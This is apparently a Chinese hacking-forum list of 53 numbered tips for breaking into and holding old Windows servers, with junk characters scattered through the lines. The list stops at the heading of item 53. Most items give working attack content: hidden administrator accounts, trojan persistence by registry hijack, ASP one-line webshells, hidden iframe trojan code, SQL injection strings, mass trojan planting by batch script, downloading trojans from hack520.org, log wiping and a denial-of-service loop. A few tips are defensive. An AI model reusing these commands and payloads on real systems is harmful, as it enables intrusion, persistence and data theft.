1、Xp系统修改权限防止病毒或木马等破坏系统,cmd下,: P+ j" q' _+ F: D4 J2 ?
cacls C:\windows\system32 /G hqw20:R$ x w0 w% k' Q* y6 r. M
思是给hqw20这个用户只能读取SYSTEM32目录,但不能进行修改或写入
( f4 ?+ `4 |7 N恢复方法:C:\>cacls C:\windows\system32 /G hqw20:F
" p( }- |5 ~8 o. m2 R% ^, R% O' J2 g$ P$ N3 z" h* z; A. a, w* T" H8 }- z
2、用Microsoft自带的IExpress工具作的捆绑木马可以躲过很多杀毒软件,运行对话框中输入Iexpress。
+ u# S4 P) j( r8 I
& N4 G+ P( I# _5 q$ r% Y3、内网使用灰鸽子,肉鸡上vidcs.exe -p端口,本地VIDCS里,VIDCS服务IP 填肉鸡的IP,VIDCS服务端口,就是给肉鸡开的端口,BINDIP添自己的内网IP,BIND端口 添8000,映射端口添8000。/ ?( Q' [7 c0 a! k
/ J3 J3 ~& ~4 i8 B* x7 q7 I" ^0 s4、建立隐藏帐号,上次总结了用guest建立隐藏的管理员,这次再介绍一种,在cmd下建立一个ating$的用户,然后注册表下复制管理员的1F4里的F 值到ating$的F值,再把ating$改为$,这样在计算机管理的用户里看不到这个隐藏帐号
M( B/ v! R5 z7 E7 q
6 g. m- z T/ W5、利用INF文件来修改注册表
9 J- W2 j+ s& N; S[Version]
' s, `8 _5 ]- h* {Signature="$CHICAGO$"
4 C; t3 p- f( Z" c4 u[Defaultinstall]: ^" j, V$ H) {5 e
addREG=Ating8 b B& s6 X5 y* ?5 E0 E) N
[Ating]
2 B5 I2 h: j2 K' K: L! AHKCU,"Software\Microsoft\Windows\CurrentVersion\Policies\system","disableregistrytools","0x00010001","1"6 ]! I3 T2 i7 ^% Q
以上代码保存为inf格式,注意没有换行符,在命令行里导入inf的命令如下:: M9 n) P K/ o$ V6 F- ]
rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 inf文件的具体路径
( a: `" K7 Z$ x- r) O$ d其中HKEY_CLASSES_ROOT 简写为 HKCR,HKEY_CURRENT_USER 简写为 HKCU
1 Z+ _# b! Z RHKEY_LOCAL_MACHINE 简写为 HKLM,HKEY_USERS 简写为 HKU
( ]' }5 j9 B* W# a% p V, }* CHKEY_CURRENT_CONFIG 简写为 HKCC2 F; L4 n/ l) n; e! \5 O) j* _/ x
0x00000000 代表的是 字符串值,0x00010001 代表的是 DWORD值
+ \" }! ?* Z3 Q# j3 i- a9 ~( m2 m"1"这里代表是写入或删除注册表键值中的具体数据- R6 G Z7 J4 B2 n
$ H! D) L2 J/ \1 X6、关于制作穿xp2防火墙的radmin,大家一定要会,各大黑客网站都有动画,
6 N6 v6 }, G# v9 {5 i4 I, @0 N多了一步就是在防火墙里添加个端口,然后导出其键值+ e" b% w4 V& f8 U
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
" r5 Z2 j0 r! J# N$ h5 ~, Y) {$ g) c4 M8 s$ D
7、系统启动时Alerter服务启动前启动木马程序ating.exe,此方法很隐蔽8 q! u1 T% v- E& `; z. N, l
在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\CurrentVersion\Image File Execution Options]下建立service.exe项,再在service.exe项建立一个Debugger的键(字符串值),键值填ating.exe的全路径。5 a6 N( H) V" H+ |6 L. y
7 _1 E! b7 ?& K6 [! O) \8 W8 W8、将ftp.exe传到服务器用来提权,可以先把它变成ating.gif格式的再用,迷惑管理员。! V" \& U' R: H, z; C4 x
2 w# r# a+ L/ T& `; B- |8 v2 Q9、有时候在我们进入了网站后台,但是没有上传图片和备份等功能,得不到webshell,' w1 D1 ?: S3 ^9 ]: j U
可是不能白来一场,可以看看发表公告或新闻支不支持html和script,支持的话加个frame马或者其他的什么。% w" L+ F) r6 R" b+ `. E/ @
( w# A5 x- {% z3 t; H) r, H10、用google帮我们找网站后台,搜索”filetype:asp site:www.hack6.com inurl:login”
, g0 w! V/ }! j. P2 t S+ D0 c* B9 O
11、我们中了盗密码的木马后不要急于删除,一般这些木马都是把密码发到指定邮箱,我们可以用探嗅软件来找到邮箱的用户名和密码,比如安全焦点的xsniff,
' l7 e ?0 A' M2 @3 z& g用法:xsniff –pass –hide –log pass.txt1 e* ?( L! d4 P! R t) V/ x
# M! }! A! |' B+ ~. H+ Q
12、google搜索的艺术2 g: J1 J2 _$ T# o& f$ z+ G
搜索关键字:“未闭合的引号”或“ADODB.Field.error”或“Either BOF or EOF in True”; I, i) q# I% g; f
或“字符串的语法错误”可以找到很多sql注入漏洞。
; x( ]* [" _8 L; a1 H
- A. U7 A! s( I8 M+ Q- B6 i+ |. ~( f13、还可以搜一些木马的关键字,比如搜索“管理登陆 海洋顶端 inurl:asp”,搜到了说明此网站服务器的其中网站肯定有漏洞。! \5 B9 N* R4 l& z
; |5 R5 C0 g8 y6 L5 s6 n* q5 e7 n
14、cmd中输入 nc –vv –l –p 1987
5 y" r+ ]% ], i# I7 ?做个bat文件内容为sqlhello 起始ip 1433 终止ip 1987 扫鸡吃2 u v/ S1 u* W: u! ]9 }
) t+ n: h; [' v. G W s) F, W15、制作T++木马,先写个ating.hta文件,内容为. c5 S6 e+ \% z* ~2 h* E
<script language="VBScript">
6 ^& W7 _3 ]3 [2 Vset wshshell=createobject ("wscript.shell" )
4 K" j$ _! g9 Ua=wshshell.run("你马的名称",1)" e" n+ D; \2 @3 F
window.close
( M4 Y2 c) X) L4 u</script>
$ x- d- W- l( U/ { _4 d再用mshta生成T++木马,命令为mshta ating.hta ating.t++,用网页木马生成器生成网页木马。4 Q# d! D, V, B8 Z" [; x1 a
! D' }% r2 x2 Z3 L
16、搜索栏里输入( C& [9 A, C9 r# T
关键字%'and 1=1 and '%'='; a, S2 F0 |: A' L
关键字%'and 1=2 and '%'='; u& b z, \* v
比较不同处 可以作为注入的特征字符4 _6 r. \3 _, D8 {
0 T# c& u" |5 Q6 S L" q
17、挂马代码<html>
$ a3 [; e$ I" g4 Y1 K7 z7 D<iframe src="马的地址" width="0" height="0" frameborder="0"></iframe>0 q; q3 d- D7 I; T+ C- B# g' T
</html>
) w! q' Z7 ^ V2 c+ c* e
/ v+ E; `5 c) ~' y' E8 q& p18、开启regedt32的SAM的管理员权限检查HKEY_LOCAL_MACHINE\SAM\SAM\和HKEY_LOCAL_MACHINE\SAM\SAM\下的管理员和guest的F键值,如果一样就是用被入侵过了,然后删了guest帐号,对方可以用guest帐号使用administraeors的权限,你也可以用这方法留住肉鸡, 这方法是简单克隆,
! j+ r5 e7 S& k- xnet localgroup administrators还是可以看出Guest是管理员来。" n9 g( @8 Q7 J
# m# y. Z4 l" b6 p5 k
19、软件instsrv.exe 把.exe文件做成系统服务来启动 用来肉鸡挂QQ等8 }' _+ L+ a6 t" v; t
用法: 安装: instsrv.exe 服务名称 路径0 r1 l$ T: c3 H# U2 K
卸载: instsrv.exe 服务名称 REMOVE
# P0 v8 |9 U5 H+ S- l7 W
2 z; W, R* o" y' ]+ ?
. R! [# o8 A+ d+ c21、SQL注入时工具---Internet选项---高级里找到显示友好的错误信息勾去掉% ~& E L- B6 j; b8 j# s
不能注入时要第一时间想到%5c暴库。
3 j+ y" C+ u5 e/ [4 W- W7 W- Y" m7 ]1 C! _2 b5 i, V1 L( X
22、很多网站程序(比如华硕中文官方网站)上传图片时有可能在检测文件的时候是 从左朝又进行检测,也就是说,他会检测文件是不是有.jpg,那么我们要是把文件改成:ating.jpg.asp试试。。由于还是ASP结尾,所以木马不会变~! c4 r7 [+ n. s! m) T# [ j# L8 R
* G8 a- K, |& M2 Z23、缺少xp_cmdshell时: v. P! A2 M( p8 s
尝试恢复EXEC sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'
6 L' \' j& f `+ \% o假如恢复不成功,可以尝试直接加用户(针对开3389的)7 M* C. r8 [) v( k. a0 \( V, {3 b
declare @o int
3 I9 C# X" {$ X9 K Rexec sp_oacreate 'wscript.shell',@o out) g/ G' p, P+ Y5 {+ J
exec sp_oamethod @o,'run',NULL,'cmd.exe /c net user ating ating /add' 再提到管理员3 C+ T# Z8 P n& G' i1 R* O7 n
, q1 q/ U7 [! u3 t24.批量种植木马.bat
# E1 N3 B3 U. y+ H' m- [: |for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
2 k0 ~& y2 t+ E1 {0 Afor /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
; v! N( t1 x2 R3 c( E) e& x4 j! f扫描地址.txt里每个主机名一行 用\\开头3 F- I* z7 g7 z0 B1 y6 G- `5 X
, U+ h# W9 q+ H0 [, h
25、在程序上传shell过程中,程序不允许包含<% %>标记符号的内容的文件上传,比如蓝屏最小 的asp木马<%execute request("l")%>,我们来把他的标签换一下: <script language=VBScript runat=server>execute request("l")</Script> 保存为.asp,程序照样执行。
9 y4 f% Z$ V7 r) H! i
2 _: o# x4 s: y( d5 A26、IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
- y+ x) @# j- B* T% O% j将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.( i# [; J0 r6 S! h+ S
.cer 等后缀的文件夹下都可以运行任何后缀的asp木马' H% L# T& `( M6 U8 |
9 S8 o4 o% m- W- R
27、telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
. L" ~6 X$ n0 N J" F2 ^然后用#clear logg和#clear line vty *删除日志
' R2 j( g9 i z$ B7 `6 P2 k: p2 @% E1 E$ A, z/ G6 e
28、电脑坏了省去重新安装系统的方法
( @% r b% x/ d) q. o* |纯dos下执行,
' r2 Z, a, f+ C! F/ vxp:copy C:\WINDOWS\repair\*.* 到 c:\windows\system32\config
2 N. j/ i! d9 z ?& m. X2k: copy C:\winnt\repair\*.* 到 c:\winnt\system32\config
! ?, L, @% _# R7 @. a$ \3 T8 ?+ V; u0 o7 `$ \
29、解决TCP/IP筛选 在注册表里有三处,分别是:! h. l5 g+ A0 }' J
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip, x+ y$ c, O v7 ?% Y
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
! V) x2 D5 O7 N# x* p7 |; f% q9 s% pHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# J" m$ W6 `' F! s分别用
5 m* X8 P9 k7 z, Cregedit -e D:\a.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
# I* \4 r4 o% E( Iregedit -e D:\b.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\Tcpip
3 N u) t) }! j# tregedit -e D:\c.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip) n* O+ R7 |/ Z( F" {: w
命令来导出注册表项$ n1 B* _" K1 L* Z# Z' d
然后把三个文件里的EnableSecurityFilters"=dword:00000001,3 l* p1 Z4 ]3 \. A( C& V) E3 ?
改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用0 d" k0 f/ G. d- j
regedit -s D:\a.reg regedit -s D:\b.reg regedit -s D:\c.reg 导入注册表即可。
& Y0 r( ^2 J; @0 k0 R8 S2 z' f$ h) f% \: [& \- q6 A
30、使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U/ A0 v7 ^% O# q' s0 h
SER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0"下的1004项的值由原来十进制的0改为十六进制的3
( I6 z! Q$ B, b" d7 r2 G& O( M% l p
31、全手工打造开3389工具* q* x# g8 e& x: c; a5 S' H; i8 j
打开记事本,编辑内容如下:$ h2 ^" |- K+ [ w. d1 B8 L
echo [Components] > c:\sql& z" c5 q" t" |1 O2 ^8 ?
echo TSEnable = on >> c:\sql
) p C2 y# l# `* a5 N3 o( fsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q: |9 Y* O$ k0 w$ v/ B# H9 v
编辑好后存为BAT文件,上传至肉鸡,执行
* v5 \) H! c2 B! x! {
, D6 W, H3 x O- H- o3 O" o p9 O32、挂马js代码document.write('<iframe height=0 width=0 src="木马地址.htm"></iframe>');保存到js页面里 可让所有页面挂马3 K5 ^! Q- W2 _4 X# ?
% @5 U+ ?5 [; }0 f, j9 A4 |8 \
33、让服务器重启
5 e1 ^/ `' U( M) j; P8 H$ f写个bat死循环:2 i: T+ g% w3 X) v* b9 t6 O
@echo off- R2 d! L& `6 L9 a/ t% ]6 F, K
:loop10 G2 s* h, c7 x' z# l$ b8 B
cls
2 R2 g: h( \+ N+ H: t% |start cmd.exe- ^' e9 Y8 X9 Y
goto loop1
+ Q0 X/ f- N+ N. ~6 Z保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启% G. X, |4 Z' u6 E4 |
( j0 S! J* |0 ^4 H! a
34、如果你登录肉鸡的3389时发现有cmd一闪而过,那你可要小心了,管理员写了个bat在监视你,. e* h+ u8 E6 d& j6 T
@echo off& z7 ?% U0 w0 F: |+ O
date /t >c:/3389.txt) ~( ~7 Z) P0 ?5 b& x( n4 G: Q1 k
time /t >>c:/3389.txt: W4 q+ d5 x' R1 w
attrib +s +h c:/3389.bat
( E3 b3 m) k4 I w2 @7 o2 Xattrib +s +h c:/3389.txt
. }% E. Z& i4 O' ^& R* d& Anetstat -an |find "ESTABLISHED" |find ":3389" >>c:/3389.txt
8 w4 \0 I# j* e" K1 s& g$ I0 P" o, `并保存为3389.bat
0 r& Q6 D( v( G- f$ E! M打开注册表找到:Userinit这个键值 在末尾加入3389.bat所在的位置,比如我放到C盘,就写:,c:/3389.bat,注意一定要加个逗号
0 B s6 y8 [9 X) ~
, N5 E3 q/ W/ u+ q35、有时候提不了权限的话,试试这个命令,在命令行里输入:' P4 f. a* G4 y2 r3 x, T
start http://www.hack520.org/muma.htm然后点执行。(muma.htm是你上传好的漏洞网页)- I) J3 d C+ B& ^2 g
输入:netstat -an | find "28876" 看看是否成功绑定,如果有就telnet上去,就有了system权限,当然也可以nc连接,本地执行命令。
, j5 a* z/ R! O) H
* C% L I; x$ \1 f+ r$ W36、在cmd下用ftp上传马方法,我们可以用echo 写一个批处理文件
9 d" m0 S9 N5 v( X$ a5 x X' `echo open 你的FTP空间地址 >c:\1.bat //输入你的FTP地址
! a. K4 G8 J4 ^4 x" Recho 你的FTP账号 >>c:\1.bat //输入账号
( F5 n6 j5 S* k7 T, p) `echo 你的FTP密码 >>c:\1.bat //输入密码
( T- Y6 o4 ^. d9 ?- f! Qecho bin >>c:\1.bat //登入6 ~0 x/ Q$ K' i
echo get 你的木马名 c:\ ating.exe >>c:\1.bat //下载某文件到某地方并改名为什么
o! Y- Z: j1 K: Z7 s" h' Cecho bye >>c:\1.bat //退出3 N) v* r5 _, H" U1 R
然后执行ftp -s:c:\1.bat即可
. t' @6 Q, |0 D4 i2 ? ^5 h& F
% b$ X" X. H3 e' A0 @0 @37、修改注册表开3389两法# v' u: d* e5 I# f' W. E9 E
(1)win2000下开终端 首先用ECHO写一个3389.reg文件,然后导入到注册表
) T, e9 x5 l( w2 _: @echo Windows Registry Editor Version 5.00 >>3389.reg. t! r3 Z) f2 G+ R* x, Y
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>3389.reg
R2 |: P8 a7 S. ^' S" `$ \$ G; fecho "Enabled"="0" >>3389.reg+ _( W0 r. I/ c( _& u
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows. g' i( g: S7 U, } m
NT\CurrentVersion\Winlogon] >>3389.reg4 Q4 E+ |0 R# J5 K7 h9 O4 M2 N
echo "ShutdownWithoutLogon"="0" >>3389.reg9 R$ p. @0 d2 U0 z" K
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
- V6 L' y9 m" Z& T, u7 }- S. Q>>3389.reg+ ?0 {+ t2 p: l) N
echo "EnableAdminTSRemote"=dword:00000001 >>3389.reg
, ?- V+ O6 W7 x5 i: @8 j, jecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]$ d7 h `) j- T' |3 q) Q
>>3389.reg
/ g: H0 J4 h& Hecho "TSEnabled"=dword:00000001 >>3389.reg0 ^* l$ a" n* n( W- F
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>3389.reg
4 X* p8 i: s" N6 S" Pecho "Start"=dword:00000002 >>3389.reg' w5 `% b j$ R! i2 k; b* G/ a0 @5 x
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService]
1 m4 R, z: {" Q5 m>>3389.reg
- s- R4 X7 n4 o) L( Xecho "Start"=dword:00000002 >>3389.reg: I7 W; h; n6 V4 G9 }+ {4 X
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>3389.reg
& |! i8 ~& p; W6 P( C: becho "Hotkey"="1" >>3389.reg% w: M3 y0 `" c! O$ k
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal. C4 P7 W6 P! t
Server\Wds\rdpwd\Tds\tcp] >>3389.reg
h' s2 X6 P9 j* P0 a1 Decho "PortNumber"=dword:00000D3D >>3389.reg
. I2 m% k' a# u3 H' eecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
: _$ F( ?0 a/ f3 A$ N* r6 b6 p V) K$ PServer\WinStations\RDP-Tcp] >>3389.reg, ?9 f3 r8 _/ X* o# b* A3 _
echo "PortNumber"=dword:00000D3D >>3389.reg
0 g9 D1 ]7 F* h+ i把这些ECHO代码到CMDSHELL下贴粘就可以生成3389.reg文件,接着regedit /s 3389.reg导入注册表。
/ N- x, _1 w3 O8 O5 }$ ](如果要改变终端端口只须把上面的两个D3D都改一下就可以了)
c9 e0 h/ b% M: E: j0 e3 P" r3 f因为win 2k下开终端不能像XP一样可以立即生效,而是需重启机器后才生效0 ~1 m7 J+ a( I" M+ y
(2)winxp和win2003终端开启
# f9 }( }) J k0 A4 {$ L3 Z用以下ECHO代码写一个REG文件:
( x j+ U- l, xecho Windows Registry Editor Version 5.00>>3389.reg
8 c4 q! g9 {4 iecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal) B& g; f+ j$ @
Server]>>3389.reg7 I) _" T1 k1 k' W! }5 _* d
echo "fDenyTSConnections"=dword:00000000>>3389.reg: U1 F3 S, D9 a8 U* q3 t/ \! f; z
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal0 H% L9 f" E; P
Server\Wds\rdpwd\Tds\tcp]>>3389.reg( i$ N8 F. t/ k" d( |
echo "PortNumber"=dword:00000d3d>>3389.reg
7 N4 n) b% _1 V8 secho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal
; G- b2 B3 P% E3 ]7 [Server\WinStations\RDP-Tcp]>>3389.reg0 Y5 N9 K& {6 F
echo "PortNumber"=dword:00000d3d>>3389.reg
/ d: k0 z; D. o; H3 l) U然后regedit /s 3389.reg del 3389.reg
5 e. D0 a8 n( o% E' X7 R. r6 YXP下不论开终端还是改终端端口都不需重启9 B3 C# G5 {% [* ^. w9 ]
; m. l& z; L0 ]7 A$ k38、找到SA密码为空的肉鸡一定要第一时间改SA密码,防止别人和我们抢肉吃# B7 }# e& x: e& S- ]
用查询分析器运行 EXEC sp_password NULL, '你要改的密码', 'sa'
+ e1 |6 |3 F! Q/ K4 d9 V9 O6 l
$ Q& Y) [* z' o) c0 _: c4 h1 M39、加强数据库安全 先要声明把mdb改成asp是不能防止下载的!
c9 \' o* T0 ^: V4 m. f(1)数据库文件名应复杂并要有特殊字符+ n% X9 m9 X1 a5 _1 X$ ~- l
(2)不要把数据库名称写在conn.asp里,要用ODBC数据源
% B0 D; |6 D6 ?( w3 X将conn.asp文档中的
- Y. Y, A) N- y a0 f0 uDBPath = Server.MapPath("数据库.mdb")
( T. a" _$ Q `' L7 _" @conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath
/ ~* i: h2 E6 H) G$ x$ J2 l
: d- S) f* |1 U0 i修改为:conn.open "ODBC数据源名称," 然后指定数据库文件的位置
5 B; R; d# s: Z( c+ f1 D(3)不放在WEB目录里# j6 Z7 `' j! E2 _& {% j" U
, m7 Y- Z+ o* T* e6 P40、登陆终端后有两个东东很危险,query.exe和tsadmin.exe要Kill掉
( O$ E! d. c8 l; n/ l4 i可以写两个bat文件8 \& B) _, }& w: J
@echo off. m0 j9 C( k0 u% f' b; P' v1 N* q) U8 p
@copy c:\winnt\system32\query.exe c:\winnt\system32\com\1\que.exe
! s% R, H. u7 x' \/ P# @@del c:\winnt\system32\query.exe
5 S$ s" ~! _5 @2 {@del %SYSTEMROOT%\system32\dllcache\query.exe
& B( n* s! Q: c' H@copy c:\winnt\system32\com\1\query.exe c:\winnt\system32\query.exe //复制一个假的
# r1 I9 C2 A# J+ m+ G' j. b) @8 g( [% K% _# D; O! n U' j
@echo off- d: k8 }1 R/ z4 D) {5 B0 i7 A& k
@copy c:\winnt\system32\tsadmin.exe c:\winnt\system32\com\1\tsadmin.exe S n' @% F& m8 L, z
@del c:\winnt\system32\tsadmin.exe
$ k( u& j' x" q2 h% c@del %SYSTEMROOT%\system32\dllcache\tsadmin.ex# s' a: A+ ~9 k5 s" i9 Y7 @
1 a- g7 v6 b. O0 ?/ D* E41、映射对方盘符
# h) S! p% c* x {$ W0 i3 h. Stelnet到他的机器上,
" B" s' m1 R7 u9 S$ D* j* znet share 查看有没有默认共享 如果没有,那么就接着运行( Q/ g8 i( Z3 r
net share c$=c:, d& z% M/ ~2 _+ M+ \
net share现在有c$7 m) W, r I: O3 e& }6 X, p, d
在自己的机器上运行, T3 W" z/ f6 {# W5 T0 w
net use k: \\*.*.*.*\c$ 把目标共享映射到本地硬盘,盘符为K3 p. X; ?7 v- {! k
2 d2 U0 x8 t9 g# g* V) L5 k! V
42、一些很有用的老知识& B8 ~+ c) w. y4 T
type c:\boot.ini ( 查看系统版本 )7 ^' B0 B7 {; n1 B
net start (查看已经启动的服务)! p {3 u7 c7 n
query user ( 查看当前终端连接 )* o$ c) f- c. i J- v8 i5 T
net user ( 查看当前用户 ); ^/ T* y J& h5 t& x+ l
net user 用户 密码/add ( 建立账号 ), }( r2 q" N1 Q/ l- g: H( j# [$ _
net localgroup administrators 用户 /add (提升某用户为管理员)
4 S( }, h. k) N, Wipconfig -all ( 查看IP什么的 )
* F" ?+ }& C) E' f5 ?& _ Ynetstat -an ( 查看当前网络状态 )) G" H. F# ?8 a1 `9 T, K
findpass 计算机名 管理员名 winlogon的pid (拿到管理员密码)5 _# v# y8 ~: A. l
克隆时Administrator对应1F4
9 F7 |5 i! z0 R6 b9 j, Bguest对应1F5. B+ Q5 w8 O. p) P2 Z
tsinternetuser对应3E8
+ f0 h: _$ r% u, D4 f) ~0 O8 G9 {7 n9 {+ B! x& S# |+ e
43、如果对方没开3389,但是装了Remote Administrator Service
: _. W+ K. f9 N% x2 s) R% N. \用这个命令F:\ftp.exe "regedit -s F:\longyi.biz\RAdmin.reg" 连接% \) v5 k# E2 n- l% v4 o4 c
解释:用serv-u漏洞导入自己配制好的radmin的注册表信息
; R0 x2 @$ c% o0 T8 G: w先备份对方的F:\ftp.exe "regedit -e F:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\RAdmin"* w O2 R* Q$ s# ?) b; _& l
0 o' A4 J- R0 g- P+ x. U
44、用lcx做内网端口映射,先在肉鸡上监听 lcx -listen 52 8089 (端口自定), y6 O! M$ _) `
本地上运行映射,lcx -slave 鸡的ip 52 我内网的ip 80 (我的WEB是80端口)" L3 Z+ ?$ K! Y
, S0 `2 h: S0 x+ x2 k! a3 A4 |) q45、在服务器写入vbs脚本下载指定文件(比如用nbsi利用注入漏洞写入)! |. e( f" W' u* I2 r; }
echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open
: N* T& B8 t9 o! q^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s =; @- Y$ A* k- ]# k3 x
CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type =
& T6 A$ n* h* T9 { I1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >ating.vbs& l% V$ m' ^# ?
(这是完整的一句话,其中没有换行符)
- R) Z: F% N5 }. L! R2 l3 j然后下载: t( j+ P/ g% b, ]
cscript down.vbs http://www.hack520.org/hack.exe hack.exe$ P; ^1 t2 O2 q* z
8 T! s- a1 ^+ ~2 H46、一句话木马成功依赖于两个条件:
: c( c; r: ? s! G$ z1 ^& s1、服务端没有禁止adodb.Stream或FSO组件
7 v5 L# k. C' k% R* a' g2、权限问题:如果当前的虚拟目录禁止user级或everyone写入的话也是不会成功的。" x$ \( J9 [% |, M0 ~3 ]) s
2 F+ h; {0 J+ N! c6 _& _47、利用DB_OWNER权限进行手工备份一句话木马的代码:9 O. V& E. Q7 X
;alter database utsz set RECOVERY FULL--5 ~- }/ _; b1 {3 c b; R6 C
;create table cmd (a image)--8 D2 T$ w( c8 l/ B/ D* ]
;backup log utsz to disk = 'D:\cmd' with init--
6 w) l8 ?0 @- {( X# F;insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--
) o( d3 [+ I9 y2 m3 t5 O4 H( F;backup log utsz to disk = 'D:\utsz_web\utsz\hacker.asp'--
7 U* E: z" t9 M) m% W注:0x3C25657865637574652872657175657374282261222929253EDA为一句话木马的16进制形式。
% z' O5 K& r- ^1 d' b" N+ ?) ?# ^/ M- K# k* p! z' U
48、tlntadmn是telnet服务的设置命令,可以对telnet服务的端口、认证方式等进行设置:
) `' N8 F3 x) ?- E% X! B! g. T, A! A& o
用法: tlntadmn [computer name] [common_options] start | stop | pause | continue | -s | -k | -m | config config_options/ ]8 C7 x6 ~; a; t7 C; M9 E7 _7 ?/ T
所有会话用 'all'。
3 H: C. V- U% `( N; _-s sessionid 列出会话的信息。
" C& N/ i; i9 l3 B5 x' F0 i-k sessionid 终止会话。; v2 Z* ^: X6 u- _ k
-m sessionid 发送消息到会话。) n* s9 B0 b! a6 _- L7 m
* E) ^9 N- \$ U" ?6 u
config 配置 telnet 服务器参数。
- e1 B' z) F7 m9 P# ?" m) q; A; } O3 Y+ _% ?
common_options 为:
* z) t. t/ W1 {$ s-u user 指定要使用其凭据的用户
6 `- o" N* V* l; V2 T( G8 S5 N" L-p password 用户密码
3 Y& J' Y2 z" @2 Q4 J3 N
' U6 b% H2 i, @config_options 为:
, r; }! D0 b2 z# vdom = domain 设定用户的默认域9 T4 x8 F% @: I) j. d
ctrlakeymap = yes|no 设定 ALT 键的映射6 Q# P$ v6 c/ N5 u
timeout = hh:mm:ss 设定空闲会话超时值5 R6 T' C! h" f/ Q: M
timeoutactive = yes|no 启用空闲会话。7 V. v9 S1 \! s
maxfail = attempts 设定断开前失败的登录企图数。& d$ G+ ?) |6 I& E( E( V
maxconn = connections 设定最大连接数。 g( |. U9 B) Q/ V( B+ g
port = number 设定 telnet 端口。
6 M- ?+ n2 w& G/ O( Usec = [+/-]NTLM [+/-]passwd
" A3 K- Q) ]7 ]3 v6 U设定身份验证机构: X2 p0 q- `0 D2 g+ L
fname = file 指定审计文件名。
% X9 c/ x0 q/ Zfsize = size 指定审计文件的最大尺寸(MB)。, Q# r5 E' r: @ v9 ~
mode = console|stream 指定操作模式。
: x2 L/ ?3 ]6 J2 tauditlocation = eventlog|file|both
- w, S& V0 T4 J5 ^9 b, P指定记录地点- ]' i4 W& f0 U/ h& T
audit = [+/-]user [+/-]fail [+/-]admin% P+ O# X( ^ q
6 p" x; s3 x, g0 O0 n' R
49、例如:在IE上访问:8 U: t% L+ r: O" A' E, y
www.hack520.org/hack.txt就会跳转到http://www.hack520.org/9 T. q! V, D) p% v0 P, I
hack.txt里面的代码是:. c2 f+ W" l& o$ d& y2 y
<body> <META HTTP-EQUIV="Refresh" CONTENT="5;URL=http://www.hack520.org/">2 ]% ]9 N' t" Q8 p0 |
把这个hack.txt发到你空间就可以了!3 s. Z7 A( T1 t" e* E& N* q
这个可以利用来做网马哦!
: t! o' A( r6 q8 c
e+ H1 V' y% S* q6 p- a50、autorun的病毒可以通过手动限制!& S; g3 f' l6 g8 H! `
1,养成好习惯,插入U盘或移动硬盘,都要按住shift让其禁止自动运行!3 y! ]2 R5 J% T* i; ?6 n& I
2,打开盘符用右键打开!切忌双击盘符~
) O& `3 K7 ?( L* X" w3,可以利用rar软件查看根目录下autorun病毒并删除之!他可以处理一些连右键都无法打开的分区!; H5 `& i6 h; v# |5 n
( E0 v" q& W G1 K
51、log备份时的一句话木马:5 n3 T: T* M1 V# ~5 b0 M) Q
a).<%%25Execute(request("go"))%%25>
# _+ J8 M( f% L+ c& _/ Eb).<%Execute(request("go"))%>
0 l4 W, _$ ~5 \+ V; d/ }c).%><%execute request("go")%><%
$ c- R& D0 f; _4 h5 Bd).<script language=VBScript runat=server>execute request("sb")</Script>
) H/ K; G1 t8 ~/ R6 De).<%25Execute(request("l"))%25>, n6 d; }8 H; B; o
f).<%if request("cmd")<>"" then execute request("pass")%>
/ y# l w& S# M- S2 i" c
; e' S0 _# \# J/ P1 A7 x52、at "12:17" /interactive cmd' D! I# t/ ~: y2 r5 a) ]$ j
执行后可以用AT命令查看新加的任务
2 S8 J3 {6 m! b8 J) n: B- ]' j用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
, R% h9 Q0 b7 \1 H9 Z5 |9 O3 _& \! i" D, y F. W
53、隐藏ASP后门的两种方法
